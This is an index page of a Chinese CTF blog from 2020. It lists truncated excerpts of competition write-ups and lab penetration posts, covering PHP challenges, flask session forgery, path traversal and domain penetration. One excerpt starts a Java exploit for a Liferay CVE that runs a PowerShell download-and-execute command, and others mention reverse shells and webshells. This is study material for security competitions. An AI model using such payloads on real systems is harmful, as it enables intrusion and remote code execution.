2020年「羊城杯」网络安全大赛

2020-09-12 18:09:00 505
ctf - 羊城杯

easycon 简单题,连上马儿后发现目录下有个bbb的txt文件,解码base64后的图片就是flag了。 BlackCat view-source:http://183.129.189.60:10022/Hei_Mao_Jing_Chang.mp3 拉到最底下有源码: ```php if(empty($_POST['Black-Cat-Sheriff']) || empty($_POST...

easycon 简单题,连上马儿后发现目录下有个bbb的txt文件,解码base64后的图片就是flag了。 Bl...

阅读全文>>

2020第四届强网杯

2020-08-24 23:08:00 400
ctf - qwb

upload wireshark导出对象后会有一个图片,根据文件名知道是steghide隐写,密码123456。 Funhash ```php <?php include 'conn.php'; highlight_file("index.php"); //level 1 if ($_GET["hash1"] != hash("md4", $_GET["hash1"])) { ...

upload wireshark导出对象后会有一个图片,根据文件名知道是steghide隐写,密码123456。 ...

阅读全文>>

ciscn2020初赛

2020-08-21 18:08:00 460
ctf - wp - ciscn

easyphp 源码给出: ```php <?php //题目环境:php:7.4.8-apache $pid = pcntl_fork(); if ($pid == -1) { die('could not fork'); }else if ($pid){ $r=pcntl_wait($status); ...

easyphp 源码给出: ```php <?php //题目环境:php:7.4.8-apache...

阅读全文>>

浅谈flask与ctf那些事

2020-08-21 11:08:00 311
ctf - flask

文章首发于:合天 最近跑了培训写了点flask的session伪造,没能用上,刚好整理了一下先前的资料把flask三种考过的点拿出来写写文章。 debug pin 本地先起一个开启debug模式的服务: ```python -- coding: utf-8 -- from flask import Flask app = Flask(name) @app.route("/") def hel...

文章首发于:合天 最近跑了培训写了点flask的session伪造,没能用上,刚好整理了一下先前的资料把flask...

阅读全文>>

WMCTF2020

2020-08-04 17:08:00 685
ctf - wmctf

SU的师傅们太顶了,全程被带飞,贡献度为0 XD 其他的题目环境下了+自己太菜了来不及复现。 web_checkin(v1) php <?php highlight_file(__FILE__); require_once 'flag.php'; if(isset($_GET['file'])) { require_once $_GET['file']; } v1版本是出题人忘记改...

SU的师傅们太顶了,全程被带飞,贡献度为0 XD 其他的题目环境下了+自己太菜了来不及复现。 web_checki...

阅读全文>>

3k ctf

2020-07-27 19:07:00 625
ctf - 3kctf

不愧是国外的比赛,就没一道会的。。。 carthagods 这题先是给了源码: php <?php if(@$_GET[*REDACTED*]){ $file=$_GET[*REDACTED*]; $f=file_get_contents('thecarthagods/'.$file); if (!preg_match("/<...

不愧是国外的比赛,就没一道会的。。。 carthagods 这题先是给了源码: php <?php ...

阅读全文>>

DASCTF 七月

2020-07-26 01:07:00 300
wp - dasctf

好久没发文了,水水 web1 前缀固定,发现../被过滤了,但这道题只是过滤了开头的../,搞不明白这么出题有什么意思。。 ```python import time import requests import base64 file = "hhhm/../../../../../../../../flag" file = base64.b64encode(file.encode()) ...

好久没发文了,水水 web1 前缀固定,发现../被过滤了,但这道题只是过滤了开头的../,搞不明白这么出题有什么...

阅读全文>>

cs与简单域渗透

2020-07-03 20:07:00 331
cs - 域渗透

前言 上回遇到了域渗透题,自己没事找了个红日的靶机来学学域渗透的东西。 红日的域渗透靶机,有三台机,配了两个网段: kali nat win7 vm2,nat win2008 vm2 win2003 vm2 nat为192.168.248.0/24 vm2为192.168.52.0/24 貌似环境问题,win7的靶机需要清理右下角通知区域图标: reg delete "HKEY_CUR...

前言 上回遇到了域渗透题,自己没事找了个红日的靶机来学学域渗透的东西。 红日的域渗透靶机,有三台机,配了两个网段:...

阅读全文>>

DozerCTF

2020-06-15 14:06:00 614
ctf - wp - DozerCTF

简单的域渗透1 一血,感觉是非预期?前面直接用powercat弹shell,后面怎么都弹不到了? Liferay的cve:CVE-2020-7961 ```java public class Exploit { static { try { String[] cmd = {"cmd.exe", "/c", "powershell IEX (New-Object System.Net.Webc...

简单的域渗透1 一血,感觉是非预期?前面直接用powercat弹shell,后面怎么都弹不到了? Liferay的...

阅读全文>>

Raven靶机渗透

2020-06-01 23:06:00 389
渗透 - PHPMailer - SUID - UDF

第一次综合渗透,感觉是个挺好玩的靶机,PHPMailer RCE+Mysql UDF+SUID提权。 初步探测 第一次渗透靶机,细细描述渗透过程。 首先nmap探测主机: root@zhang:/home# nmap -sP 192.168.40.0/24 Starting Nmap 7.70 ( https://nmap.org ) at 2020-05-29 23:21 CST Nmap...

第一次综合渗透,感觉是个挺好玩的靶机,PHPMailer RCE+Mysql UDF+SUID提权。 初步探测 第...

阅读全文>>

近期动态

2021年1月1日 18:08
元旦快乐

一个web狗的博客

程序猿 CTFer Python Java Php 努力学习ing!!!

标签云

二叉树 算法 java 沙箱逃逸 python ctf sql 国赛强网杯 wp 省赛强网杯 flask ssrf sqlite roar 海啸杯 红帽杯 代码审计 php 反序列化 thinkphp phar 图床 lsb加密 取证分析 session 文件操作 注解 反射 servlet web BJDCTF mrctf Midnight TG:Hack HackZone bbctf hfctf 安恒 De1CTF 网鼎 GKCTF 渗透 PHPMailer SUID UDF DozerCTF cs 域渗透 dasctf 3kctf wmctf 特性 nodejs ciscn qwb 羊城杯 西湖论剑 appsec_il 漏洞学习 redis 祥云杯 备忘 蚁剑 编码器 bypass disable function 纵横杯

链接推送

XiaoLeung
SkYe
kawhi
Tattoo
Zedd
phith0n 
   _   _ _     _    ___  ___
  | | | | |   | |   |  \/  |
  | |_| | |__ | |__ | .  . |
  |  _  | '_ \| '_ \| |\/| |
  | | | | | | | | | | |  | |
  \_| |_/_| |_|_| |_\_|  |_/

CopyRight © 2019-2020 HhhM
Power By Django & Bootstrap
已运行
粤ICP备19064649号